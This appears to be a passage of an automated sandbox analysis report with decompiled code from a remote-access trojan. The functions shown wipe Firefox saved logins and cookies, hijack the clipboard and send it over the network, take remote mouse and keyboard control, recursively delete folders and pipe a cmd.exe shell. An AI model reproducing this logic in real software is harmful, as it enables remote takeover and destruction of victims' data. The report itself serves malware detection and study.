                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004057F8
                                • Part of subcall function 0042EDF6: __onexit.LIBCMT ref: 0042EDFC
                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6C8,00000062,0045F6AC), ref: 004058E5
                              • Sleep.KERNEL32(00000064,00000062,0045F6AC), ref: 004058FE
                              • TerminateProcess.KERNEL32(00000000), ref: 00405917
                              • CloseHandle.KERNEL32 ref: 00405923
                              • CloseHandle.KERNEL32 ref: 0040592F
                              • CloseHandle.KERNEL32 ref: 00405945
                              • CloseHandle.KERNEL32 ref: 00405951
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                              • String ID: SystemDrive$cmd.exe
                              • API String ID: 2994406822-3633465311
                              • Opcode ID: f3f296f1679a69185446eb36fae990717c7b1ee753301a2b67895b627e89174f
                              • Instruction ID: 36aeaf24663ea89ca73ce0651989de9eb03545aec66eda9801f6c68c010dee92
                              • Opcode Fuzzy Hash: f3f296f1679a69185446eb36fae990717c7b1ee753301a2b67895b627e89174f
                              • Instruction Fuzzy Hash: 1391B371F00208ABD714BB669D4696E3B69EB45714B10407FF901B72E2EFB88D01DB5E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E0040A3AF(void* __ebx, void* __edi, void* __eflags) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				char _v148;
                              				struct _WIN32_FIND_DATAA _v468;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t45;
                              				signed int _t58;
                              				signed int _t59;
                              				signed int _t73;
                              				signed int _t75;
                              				char* _t108;
                              				signed int _t109;
                              				char* _t129;
                              				void* _t130;
                              				void* _t134;
                              				void* _t135;
                              				void* _t136;
                              				void* _t137;
                              
                              				_t142 = __eflags;
                              				_t134 = __edi;
                              				_t89 = __ebx;
                              				E004020B5(__ebx,  &_v100);
                              				E004020B5(__ebx,  &_v76);
                              				E004020B5(__ebx,  &_v28);
                              				_t45 = E00402064(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                              				L00401FB1( &_v28, _t46, _t135, E004075C4(_t89,  &_v52, E0043919A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
                              				L00401FA7();
                              				L00401FA7();
                              				_t128 =  &_v28;
                              				_t136 = FindFirstFileA(L00401F75(E0040755A( &_v124,  &_v28, _t142, "*")),  &_v468);
                              				L00401FA7();
                              				_t143 = _t136 - 0xffffffff;
                              				if(_t136 != 0xffffffff) {
                              					while(1) {
                              						L15:
                              						__eflags = FindNextFileA(_t136,  &_v468);
                              						if(__eflags == 0) {
                              							break;
                              						}
                              						__eflags = _v468.dwFileAttributes & 0x00000010;
                              						if((_v468.dwFileAttributes & 0x00000010) == 0) {
                              							continue;
                              						}
                              						_t108 =  &(_v468.cFileName);
                              						__eflags =  *_t108 - 0x2e;
                              						if( *_t108 != 0x2e) {
                              							L5:
                              							_t129 =  &(_v468.cFileName);
                              							_t109 = 0;
                              							__eflags = 0;
                              							while(1) {
                              								_t58 =  *(_t129 + _t109) & 0x000000ff;
                              								_t130 = "..";
                              								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
                              								_t128 =  &(_v468.cFileName);
                              								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
                              									break;
                              								}
                              								_t109 = _t109 + 1;
                              								__eflags = _t109 - 3;
                              								if(_t109 != 3) {
                              									continue;
                              								}
                              								_t59 = 0;
                              								L10:
                              								__eflags = _t59;
                              								if(__eflags != 0) {
                              									L00401FB1( &_v100, _t61, _t136, E0040530D(_t89,  &_v52, E0040755A( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
                              									L00401FA7();
                              									L00401FA7();
                              									_t128 = E0040755A( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
                              									L00401FB1( &_v76, _t67, _t136, E0040530D(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
                              									L00401FA7();
                              									L00401FA7();
                              									_t73 = DeleteFileA(L00401F75( &_v100));
                              									__eflags = _t73;
                              									if(_t73 == 0) {
                              										GetLastError();
                              									}
                              									_t75 = DeleteFileA(L00401F75( &_v76));
                              									__eflags = _t75;
                              									if(_t75 == 0) {
                              										GetLastError();
                              									}
                              								}
                              								goto L15;
                              							}
                              							asm("sbb eax, eax");
                              							_t59 = _t58 | 0x00000001;
                              							__eflags = _t59;
                              							goto L10;
                              						}
                              						__eflags =  *(_t108 + 1) & 0x000000ff;
                              						if(( *(_t108 + 1) & 0x000000ff) == 0) {
                              							continue;
                              						}
                              						goto L5;
                              					}
                              					E00402064(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
                              					L0040AA8C(_t89, _t128, __eflags);
                              					FindClose(_t136);
                              					goto L17;
                              				} else {
                              					FindClose(_t136);
                              					E00402064(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
                              					L0040AA8C(_t89,  &_v28, _t143);
                              					L17:
                              					L00401FA7();
                              					L00401FA7();
                              					L00401FA7();
                              					return 1;
                              				}
                              			}

                              0x0040a3af
                              0x0040a3af
                              0x0040a3af
                              0x0040a3bc
                              0x0040a3c4
                              0x0040a3cc
                              0x0040a3d9
                              0x0040a3f9
                              0x0040a401
                              0x0040a409
                              0x0040a41a
                              0x0040a437
                              0x0040a439
                              0x0040a43e
                              0x0040a441
                              0x0040a577
                              0x0040a577
                              0x0040a585
                              0x0040a587
                              0x00000000
                              0x00000000
                              0x0040a46a
                              0x0040a471
                              0x00000000
                              0x00000000
                              0x0040a477
                              0x0040a47d
                              0x0040a480
                              0x0040a48e
                              0x0040a48e
                              0x0040a494
                              0x0040a494
                              0x0040a496
                              0x0040a496
                              0x0040a49a
                              0x0040a49f
                              0x0040a4a2
                              0x0040a4a8
                              0x00000000
                              0x00000000
                              0x0040a4aa
                              0x0040a4ab
                              0x0040a4ae
                              0x00000000
                              0x00000000
                              0x0040a4b0
                              0x0040a4b9
                              0x0040a4b9
                              0x0040a4bb
                              0x0040a4eb
                              0x0040a4f3
                              0x0040a4fe
                              0x0040a51b
                              0x0040a52d
                              0x0040a538
                              0x0040a540
                              0x0040a54e
                              0x0040a554
                              0x0040a556
                              0x0040a558
                              0x0040a558
                              0x0040a567
                              0x0040a56d
                              0x0040a56f
                              0x0040a571
                              0x0040a571
                              0x0040a56f
                              0x00000000
                              0x0040a4bb
                              0x0040a4b4
                              0x0040a4b6
                              0x0040a4b6
                              0x00000000
                              0x0040a4b6
                              0x0040a486
                              0x0040a488
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040a488
                              0x0040a597
                              0x0040a59c
                              0x0040a5a5
                              0x00000000
                              0x0040a447
                              0x0040a448
                              0x0040a458
                              0x0040a45d
                              0x0040a5ab
                              0x0040a5ae
                              0x0040a5b6
                              0x0040a5be
                              0x0040a5c9
                              0x0040a5c9

                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A42E
                              • FindClose.KERNEL32(00000000), ref: 0040A448
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A57F
                              • FindClose.KERNEL32(00000000), ref: 0040A5A5
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                              • API String ID: 1164774033-3681987949
                              • Opcode ID: 97f7e2f54df5a1cdee6a28329f9dcdda7ea771a6a33053010f7c568708f73f53
                              • Instruction ID: fceb70f3503f9a85c82f74107e9b35daee5a72393052f256031c89f00bf2afe6
                              • Opcode Fuzzy Hash: 97f7e2f54df5a1cdee6a28329f9dcdda7ea771a6a33053010f7c568708f73f53
                              • Instruction Fuzzy Hash: 22513C309102195ACB14FBB1DC5AEEEB774AF11309F50017FE406B60E2EF7C5A49CA5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E0040A5CA(void* __edi, void* __eflags) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				struct _WIN32_FIND_DATAA _v444;
                              				void* __ebx;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t35;
                              				signed int _t56;
                              				signed int _t57;
                              				long _t68;
                              				char* _t92;
                              				signed int _t93;
                              				void* _t102;
                              				char* _t105;
                              				void* _t106;
                              				void* _t108;
                              				void* _t109;
                              				void* _t110;
                              				void* _t111;
                              
                              				_t116 = __eflags;
                              				_t108 = __edi;
                              				E004020B5(0,  &_v52);
                              				E004020B5(0,  &_v28);
                              				_t35 = E00402064(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                              				L00401FB1( &_v28, _t36, _t109, E004075C4(0,  &_v76, E0043919A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
                              				L00401FA7();
                              				L00401FA7();
                              				_t104 =  &_v28;
                              				_t110 = FindFirstFileA(L00401F75(E0040755A( &_v100,  &_v28, _t116, "*")),  &_v444);
                              				L00401FA7();
                              				_t117 = _t110 - 0xffffffff;
                              				if(_t110 != 0xffffffff) {
                              					__eflags = FindNextFileA(_t110,  &_v444);
                              					if(__eflags == 0) {
                              						L17:
                              						E00402064(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
                              						L0040AA8C(0, _t104, __eflags);
                              						FindClose(_t110);
                              						goto L18;
                              					} else {
                              						__eflags = 0;
                              						do {
                              							__eflags = _v444.dwFileAttributes & 0x00000010;
                              							if((_v444.dwFileAttributes & 0x00000010) == 0) {
                              								goto L16;
                              							} else {
                              								_t92 =  &(_v444.cFileName);
                              								__eflags =  *_t92 - 0x2e;
                              								if( *_t92 != 0x2e) {
                              									L8:
                              									_t105 =  &(_v444.cFileName);
                              									_t93 = 0;
                              									while(1) {
                              										_t56 =  *(_t105 + _t93) & 0x000000ff;
                              										_t106 = "..";
                              										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
                              										_t104 =  &(_v444.cFileName);
                              										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
                              											break;
                              										}
                              										_t93 = _t93 + 1;
                              										__eflags = _t93 - 3;
                              										if(_t93 != 3) {
                              											continue;
                              										} else {
                              											_t57 = 0;
                              										}
                              										L13:
                              										__eflags = _t57;
                              										if(__eflags == 0) {
                              											goto L16;
                              										} else {
                              											_t104 = E0040755A( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
                              											L00401FB1( &_v52, _t59, _t110, E0040530D(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
                              											L00401FA7();
                              											L00401FA7();
                              											__eflags = DeleteFileA(L00401F75( &_v52));
                              											if(__eflags != 0) {
                              												_t102 = _t111 - 0x18;
                              												_push("\n[Firefox cookies found, cleared!]");
                              												goto L2;
                              											} else {
                              												_t68 = GetLastError();
                              												__eflags = _t68 != 0;
                              												if(_t68 != 0) {
                              													FindClose(_t110);
                              												} else {
                              													goto L16;
                              												}
                              											}
                              										}
                              										goto L19;
                              									}
                              									asm("sbb eax, eax");
                              									_t57 = _t56 | 0x00000001;
                              									__eflags = _t57;
                              									goto L13;
                              								} else {
                              									__eflags =  *(_t92 + 1) & 0x000000ff;
                              									if(( *(_t92 + 1) & 0x000000ff) == 0) {
                              										goto L16;
                              									} else {
                              										goto L8;
                              									}
                              								}
                              							}
                              							goto L19;
                              							L16:
                              							__eflags = FindNextFileA(_t110,  &_v444);
                              						} while (__eflags != 0);
                              						goto L17;
                              					}
                              				} else {
                              					FindClose(_t110);
                              					_t102 = _t111 - 0x18;
                              					_push("\n[Firefox Cookies not found]");
                              					L2:
                              					E00402064(0, _t102);
                              					L0040AA8C(0, _t104, _t117);
                              					L18:
                              				}
                              				L19:
                              				L00401FA7();
                              				L00401FA7();
                              				return 1;
                              			}

                              0x0040a5ca
                              0x0040a5ca
                              0x0040a5d8
                              0x0040a5e0
                              0x0040a5ed
                              0x0040a60d
                              0x0040a615
                              0x0040a61d
                              0x0040a62e
                              0x0040a64b
                              0x0040a64d
                              0x0040a652
                              0x0040a655
                              0x0040a688
                              0x0040a68a
                              0x0040a756
                              0x0040a760
                              0x0040a765
                              0x0040a76e
                              0x00000000
                              0x0040a690
                              0x0040a690
                              0x0040a692
                              0x0040a692
                              0x0040a699
                              0x00000000
                              0x0040a69f

                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A642
                              • FindClose.KERNEL32(00000000), ref: 0040A658
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A682
                              • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A72A
                              • GetLastError.KERNEL32 ref: 0040A734
                              • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A748
                              • FindClose.KERNEL32(00000000), ref: 0040A76E
                              • FindClose.KERNEL32(00000000), ref: 0040A78F
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                              • API String ID: 532992503-432212279
                              • Opcode ID: 0d64f0fd255b8ee415b355969872e335040334bbf39fd31d40a8ecc0d88fdc24
                              • Instruction ID: a0e0b87e43e1ffccf28ad4a7bbdc78d64d502d6bba83e6bf3342b17ddf37f993
                              • Opcode Fuzzy Hash: 0d64f0fd255b8ee415b355969872e335040334bbf39fd31d40a8ecc0d88fdc24
                              • Instruction Fuzzy Hash: 32417C309002196ACB14FB75CC569EE7738AF11305F50417BE805B71D2EF3D9A4ACA9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E004126A5(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
                              				void* __ebx;
                              				int _t10;
                              				void* _t20;
                              				void* _t22;
                              				void* _t31;
                              				struct HWND__* _t38;
                              				void* _t57;
                              				void* _t61;
                              				void* _t64;
                              				void* _t66;
                              
                              				_t55 = __edx;
                              				_t10 = OpenClipboard(_t38);
                              				_t68 = _t10;
                              				if(_t10 != 0) {
                              					EmptyClipboard();
                              					L00401E29( &_a16, _t55, _t68, _t38);
                              					_t57 = GlobalAlloc(0x2000, E00402469() + 2);
                              					_t20 = GlobalLock(_t57);
                              					L00401E29( &_a12, _t55, _t68, _t38);
                              					_t22 = E00402469();
                              					L00431DF0(_t20, L00401F75(L00401E29( &_a8, _t55, _t68, _t38)), _t22);
                              					_t66 = _t64 + 0xc;
                              					GlobalUnlock(_t57);
                              					SetClipboardData(0xd, _t57);
                              					CloseClipboard();
                              					if(OpenClipboard(_t38) != 0) {
                              						_t61 = GetClipboardData(0xd);
                              						_t31 = GlobalLock(_t61);
                              						GlobalUnlock(_t61);
                              						CloseClipboard();
                              						_t50 =  !=  ? _t31 : 0x45f714;
                              						E0040425F(_t38,  &_a36,  !=  ? _t31 : 0x45f714);
                              						_t55 =  &_a32;
                              						L00416CF4(_t38, _t66 - 0x18,  &_a32);
                              						_push(0x6b);
                              						L00404A6E(_t38, 0x46c768,  &_a32, _t31);
                              						L00401ED0();
                              					}
                              				}
                              				L00401E54( &_a16, _t55);
                              				L00401FA7();
                              				L00401FA7();
                              				return 0;
                              			}

                              APIs
                              • OpenClipboard.USER32 ref: 004126A6
                              • EmptyClipboard.USER32 ref: 004126B4
                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004126D4
                              • GlobalLock.KERNEL32 ref: 004126DD
                              • GlobalUnlock.KERNEL32(00000000), ref: 00412713
                              • SetClipboardData.USER32(0000000D,00000000), ref: 0041271C
                              • CloseClipboard.USER32 ref: 00412739
                              • OpenClipboard.USER32 ref: 00412740
                              • GetClipboardData.USER32 ref: 00412750
                              • GlobalLock.KERNEL32 ref: 00412759
                              • GlobalUnlock.KERNEL32(00000000), ref: 00412762
                              • CloseClipboard.USER32 ref: 00412768
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                              • String ID:
                              • API String ID: 3520204547-0
                              • Opcode ID: 1176a2fa92a27c2bfc0c58389ed509e639c1d09a8cc1b0c481b7c4fd4d2cf595
                              • Instruction ID: 760fdb740c6fae1fa457759c4ec7e7655d91424e05930c477d6cb01e2b71feaa
                              • Opcode Fuzzy Hash: 1176a2fa92a27c2bfc0c58389ed509e639c1d09a8cc1b0c481b7c4fd4d2cf595
                              • Instruction Fuzzy Hash: 5D2151716043009BC214BF71ED5A9BF7769AB90746F04443EF806D21E2EF78CA09866A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00414923(signed int __edx, void* __eflags, char _a8) {
                              				void* _v28;
                              				char _v32;
                              				void* _v36;
                              				void* _v40;
                              				char _v44;
                              				char _v48;
                              				intOrPtr* _t60;
                              				intOrPtr* _t65;
                              				intOrPtr* _t67;
                              				intOrPtr* _t72;
                              				intOrPtr* _t74;
                              				char* _t79;
                              				char* _t80;
                              				char* _t81;
                              				intOrPtr* _t82;
                              				intOrPtr* _t85;
                              				intOrPtr _t90;
                              				signed int _t101;
                              				signed int _t109;
                              				signed int _t118;
                              				signed int _t136;
                              
                              				_t136 = __edx;
                              				_t90 =  *((intOrPtr*)(E004051EA(0)));
                              				E00404286( &_a8,  &_v32, 1, 0xffffffff);
                              				if(_t90 != 0x30) {
                              					__eflags = _t90 - 0x31;
                              					if(_t90 != 0x31) {
                              						__eflags = _t90 - 0x32;
                              						if(_t90 != 0x32) {
                              							__eflags = _t90 - 0x33;
                              							if(_t90 != 0x33) {
                              								__eflags = _t90 - 0x34;
                              								if(_t90 != 0x34) {
                              									__eflags = _t90 - 0x35;
                              									if(_t90 != 0x35) {
                              										__eflags = _t90 - 0x36;
                              										if(_t90 == 0x36) {
                              											_push(0);
                              											_push(0x78);
                              											goto L15;
                              										}
                              									} else {
                              										_push(0);
                              										_push(0xffffff88);
                              										L15:
                              										mouse_event(0x800, 0, 0, ??, ??);
                              									}
                              								} else {
                              									_v40 =  *((intOrPtr*)(E004051EA(0)));
                              									_t60 = E004051EA(4);
                              									_t101 =  *0x46bd74; // 0x0
                              									_v40 =  *_t60;
                              									E004147BD( *((intOrPtr*)(0x46bd78 + _t101 * 4)),  &_v44, __eflags,  &_v40);
                              									L00414BEF(_v44, _v40);
                              								}
                              							} else {
                              								_t65 = E004051EA(0);
                              								_v44 =  *((intOrPtr*)(E004051EA(4)));
                              								_t67 = E004051EA(8);
                              								_t109 =  *0x46bd74; // 0x0
                              								_v44 =  *_t67;
                              								E004147BD( *((intOrPtr*)(0x46bd78 + _t109 * 4)),  &_v48, __eflags,  &_v44);
                              								L00414B93( *_t65, _v48, _v44);
                              								goto L8;
                              							}
                              						} else {
                              							_t72 = E004051EA(0);
                              							_v40 =  *((intOrPtr*)(E004051EA(4)));
                              							_t74 = E004051EA(8);
                              							_t118 =  *0x46bd74; // 0x0
                              							_v48 =  *_t74;
                              							E004147BD( *((intOrPtr*)(0x46bd78 + _t118 * 4)),  &_v44, __eflags,  &_v48);
                              							L00414B37( *_t72, _v44, _v48);
                              							goto L8;
                              						}
                              					} else {
                              						_t79 = E004051EA(4);
                              						_t80 = E004051EA(3);
                              						_t81 = E004051EA(2);
                              						_t82 = E004051EA(0);
                              						 *_t79 =  *_t80;
                              						__eflags =  *_t81;
                              						L00414C27( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
                              						goto L8;
                              					}
                              				} else {
                              					E004051EA(0);
                              					_t85 = E004051EA(1);
                              					L00413F3B( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E004051EA(2)));
                              					L8:
                              				}
                              				L00401FA7();
                              				return L00401FA7();
                              			}

                              APIs
                              • StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 00414977
                              • mouse_event.USER32 ref: 00414B19
                                • Part of subcall function 004147BD: GetSystemMetrics.USER32 ref: 004147F2
                                • Part of subcall function 004147BD: GetSystemMetrics.USER32 ref: 00414807
                                • Part of subcall function 00414BEF: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 00414C1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: MetricsSystem$InputSendmouse_event
                              • String ID: 0$1$2$3$4$5$6
                              • API String ID: 1731092567-2737206560
                              • Opcode ID: 465a40b6c4bbad9506da93c7662b821433875c1b0bd26355eb879b2e96cd732d
                              • Instruction ID: 68c723f4934a31661bb6c48b0de6a348d1b664bcb13febd58c7bbbb5345cd8c0
                              • Opcode Fuzzy Hash: 465a40b6c4bbad9506da93c7662b821433875c1b0bd26355eb879b2e96cd732d
                              • Instruction Fuzzy Hash: CA518D70A083019FD704EF21D865F9B77A8EF95314F00492EF5525B2D1DF38AA49CB9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004170AC(WCHAR* __ecx) {
                              				char _v5;
                              				WCHAR* _v12;
                              				short _v532;
                              				short _v1052;
                              				struct _WIN32_FIND_DATAW _v1644;
                              				signed int _t52;
                              				intOrPtr _t53;
                              				char _t54;
                              				short _t55;
                              				signed int _t56;
                              				intOrPtr _t57;
                              				char _t58;
                              				signed int _t63;
                              				char _t68;
                              				void _t72;
                              				void _t73;
                              				signed int _t78;
                              				signed int _t84;
                              				void* _t86;
                              				intOrPtr* _t89;
                              				signed short* _t90;
                              				void* _t91;
                              				signed int _t95;
                              				void* _t100;
                              				void* _t102;
                              				signed short* _t103;
                              				void* _t106;
                              				void* _t107;
                              				signed int _t108;
                              				intOrPtr* _t110;
                              				void* _t112;
                              				void* _t118;
                              				void* _t120;
                              				void* _t123;
                              				void* _t124;
                              
                              				_v12 = __ecx;
                              				_t103 = __ecx;
                              				_t118 =  &_v1052 - __ecx;
                              				do {
                              					_t52 =  *_t103 & 0x0000ffff;
                              					 *(_t118 + _t103) = _t52;
                              					_t103 =  &(_t103[1]);
                              				} while (_t52 != 0);
                              				_t89 =  &_v1052 - 2;
                              				do {
                              					_t53 =  *((intOrPtr*)(_t89 + 2));
                              					_t89 = _t89 + 2;
                              				} while (_t53 != 0);
                              				_t54 = L"\\*"; // 0x2a005c
                              				 *_t89 = _t54;
                              				_t106 =  &_v532 - __ecx;
                              				_t55 =  *0x465908; // 0x0
                              				 *((short*)(_t89 + 4)) = _t55;
                              				_t90 = __ecx;
                              				do {
                              					_t56 =  *_t90 & 0x0000ffff;
                              					 *(_t106 + _t90) = _t56;
                              					_t90 =  &(_t90[1]);
                              				} while (_t56 != 0);
                              				_t110 =  &_v532 - 2;
                              				do {
                              					_t57 =  *((intOrPtr*)(_t110 + 2));
                              					_t110 = _t110 + 2;
                              				} while (_t57 != 0);
                              				_t58 = "\\"; // 0x5c
                              				 *_t110 = _t58;
                              				_t86 = FindFirstFileW( &_v1052,  &_v1644);
                              				if(_t86 == 0xffffffff) {
                              					L34:
                              					return 0;
                              				}
                              				_t91 = 0;
                              				do {
                              					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
                              					_t91 = _t91 + 2;
                              					 *(_t123 + _t91 - 0x41a) = _t63;
                              				} while (_t63 != 0);
                              				_v5 = 1;
                              				do {
                              					if(FindNextFileW(_t86,  &_v1644) == 0) {
                              						if(GetLastError() != 0x12) {
                              							L33:
                              							FindClose(_t86);
                              							goto L34;
                              						}
                              						_t68 = 0;
                              						_v5 = 0;
                              						goto L23;
                              					}
                              					if(E00417036( &(_v1644.cFileName)) != 0) {
                              						L22:
                              						_t68 = _v5;
                              						goto L23;
                              					}
                              					_t107 =  &(_v1644.cFileName);
                              					_t120 = _t107;
                              					do {
                              						_t72 =  *_t107;
                              						_t107 = _t107 + 2;
                              					} while (_t72 != 0);
                              					_t108 = _t107 - _t120;
                              					_t112 =  &_v532 - 2;
                              					do {
                              						_t73 =  *(_t112 + 2);
                              						_t112 = _t112 + 2;
                              					} while (_t73 != 0);
                              					_t95 = _t108 >> 2;
                              					memcpy(_t112, _t120, _t95 << 2);
                              					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
                              					_t124 = _t124 + 0x18;
                              					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
                              						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
                              							SetFileAttributesW( &_v532, 0x80);
                              						}
                              						if(DeleteFileW( &_v532) == 0) {
                              							goto L33;
                              						} else {
                              							_t100 = 0;
                              							do {
                              								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
                              								_t100 = _t100 + 2;
                              								 *(_t123 + _t100 - 0x212) = _t78;
                              							} while (_t78 != 0);
                              							goto L22;
                              						}
                              					}
                              					if(E004170AC( &_v532) == 0) {
                              						goto L33;
                              					}
                              					RemoveDirectoryW( &_v532);
                              					_t102 = 0;
                              					do {
                              						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
                              						_t102 = _t102 + 2;
                              						 *(_t123 + _t102 - 0x212) = _t84;
                              					} while (_t84 != 0);
                              					goto L22;
                              					L23:
                              				} while (_t68 != 0);
                              				FindClose(_t86);
                              				return RemoveDirectoryW(_v12);
                              			}

                              APIs
                              • FindFirstFileW.KERNEL32(?,?,?,?,0046C238), ref: 00417143
                              • FindNextFileW.KERNEL32(00000000,?,?,?,0046C238), ref: 0041717A
                              • RemoveDirectoryW.KERNEL32(?,?,?,0046C238), ref: 004171F4
                              • FindClose.KERNEL32(00000000,?,?,0046C238), ref: 00417222
                              • RemoveDirectoryW.KERNEL32(?,?,?,0046C238), ref: 0041722B
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,0046C238), ref: 00417248
                              • DeleteFileW.KERNEL32(?,?,?,0046C238), ref: 00417255
                              • GetLastError.KERNEL32(?,?,0046C238), ref: 0041727D
                              • FindClose.KERNEL32(00000000,?,?,0046C238), ref: 00417290
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                              • String ID:
                              • API String ID: 2341273852-0
                              • Opcode ID: fe33a7ecd763378ccfdde08d8187e5d99106823fa4ca85dde7b5a7b3d181c472
                              • Instruction ID: f55fdd06e51736921a03e431044bfc406960ad07d078f96de4dc955a1c0aff70
                              • Opcode Fuzzy Hash: fe33a7ecd763378ccfdde08d8187e5d99106823fa4ca85dde7b5a7b3d181c472
                              • Instruction Fuzzy Hash: 4C5105345042198ACF24DF68CC84AFAB7B5BF58305F5045EAE84993251EB359ECBCB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E0044190C(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                              				signed int _v8;
                              				signed int _v12;
                              				int _v16;
                              				int _v20;
                              				int _v24;
                              				char _v52;
                              				int _v56;
                              				int _v60;
                              				signed int _v100;
                              				char _v272;
                              				intOrPtr _v276;
                              				char _v280;
                              				char _v356;
                              				char _v360;
                              				void* __ebp;
                              				signed int _t65;
                              				signed int _t72;
                              				signed int _t74;
                              				signed int _t78;
                              				signed int _t85;
                              				signed int _t89;
                              				signed int _t91;
                              				long _t93;
                              				signed int* _t96;
                              				signed int _t99;
                              				signed int _t102;
                              				signed int _t106;
                              				void* _t113;
                              				signed int _t116;
                              				void* _t117;
                              				void* _t119;
                              				void* _t120;
                              				void* _t122;
                              				signed int _t124;
                              				signed int _t125;
                              				signed int* _t128;
                              				signed int _t129;
                              				void* _t132;
                              				void* _t134;
                              				signed int _t135;
                              				signed int _t137;
                              				void* _t140;
                              				intOrPtr _t141;
                              				void* _t143;
                              				signed int _t150;
                              				signed int _t151;
                              				signed int _t154;
                              				signed int _t158;
                              				signed int _t161;
                              				intOrPtr* _t166;
                              				signed int _t167;
                              				intOrPtr* _t168;
                              				void* _t169;
                              				intOrPtr _t170;
